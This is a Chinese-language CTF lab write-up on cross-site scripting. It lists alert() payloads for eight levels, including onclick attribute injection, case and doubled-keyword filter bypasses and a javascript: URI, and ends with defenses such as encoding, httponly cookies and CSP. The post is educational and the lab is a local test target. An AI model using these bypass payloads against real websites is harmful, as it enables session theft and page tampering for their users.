欢迎关注 『网络攻防CTF』 系列,持续更新中
欢迎关注 『网络攻防CTF』 系列,持续更新中
什么是xss跨站攻击
跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。
用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接。攻击者通过在链接中插入恶意代码,就能够盗取用户信息。攻击者通常会用十六进制(或其他编码方式)将链接编码,以免用户怀疑它的合法性。网站在接收到包含恶意代码的请求之后会产成一个包含恶意代码的页面,而这个页面看起来就像是那个网站应当生成的合法页面一样。许多流行的留言本和论坛程序允许用户发表包含HTML和javascript的帖子。假设用户甲发表了一篇包含恶意脚本的帖子,那么用户乙在浏览这篇帖子时,恶意脚本就会执行,盗取用户乙的session信息。
实验内容
1.普通xss
2.代码过滤<
3.代码过滤<、>、"
5.将<script 转换成 <scr_ipt ,on转换成 o_n
6.将<script 转换成 <scr_ipt ,on转换成 o_n,但没有大小比较
7.大小写不能用了,script,on,src ,data ,href 都直接转换成空
8.<script 转换成 <scr_ipt ,on 转换成 o_n ,src 转换成 sr_c ,data 转换成 da_ta,href 转换成 hr_ef,大小写也失效了," 还被编码,但是尖括号<> ,单引号 ’ ,% ,# ,& 符号没有被过滤
实验步骤
点击图片后进入下面的第一题
在url后面写入?name=输入<script>alert('2')</script>
最终的url是
http://192.168.12.108/xss/level1.php?name=%E8%BE%93%E5%85%A5%3Cscript%3Ealert(%272%27)%3C/script%3E
现在的浏览器都会防御基本的攻击,出现了提示,建议用谷歌浏览器方便测试。不会出现下面的内容。
OK
题目2
"onclick="alert('2')
点击搜索后再点击一下搜索框内的字母就可以了。
题目3
'onclick='alert("2")
题目4
"onclick="alert('2')
题目5
要点击一下2
题目6
"Onclick="alert('2')
题目7
"oonnclick="alert('2')
题目8
javascript:alert('2')
如何避免xss跨站攻击
标签过滤
事件过滤
敏感字符过滤
设置httponly防止Cookie被获取
内容安全策略(CSP)
在将不可信数据插入到HTML标签之间时,对这些数据进行HTML Entity编码
在将不可信数据插入到HTML属性里时,对这些数据进行HTML属性编码
在将不可信数据插入到SCRIPT里时,对这些数据进行SCRIPT编码
在将不可信数据插入到Style属性里时,对这些数据进行CSS编码
(原文链接:https://blog.csdn.net/lady_killer9/article/details/107126005)
总结
大家喜欢的话,给个👍,点个关注!继续跟大家分享敲代码过程中遇到的问题!
版权声明:
发现你走远了@mzh原创作品,转载必须标注原文链接
Copyright 2022 mzh
Crated:2022-3-6
欢迎关注 『网络攻防CTF』 系列,持续更新中
欢迎关注 『网络攻防CTF』 系列,持续更新中
【网络攻防CTF】草稿(保姆级图文)
【更多内容敬请期待】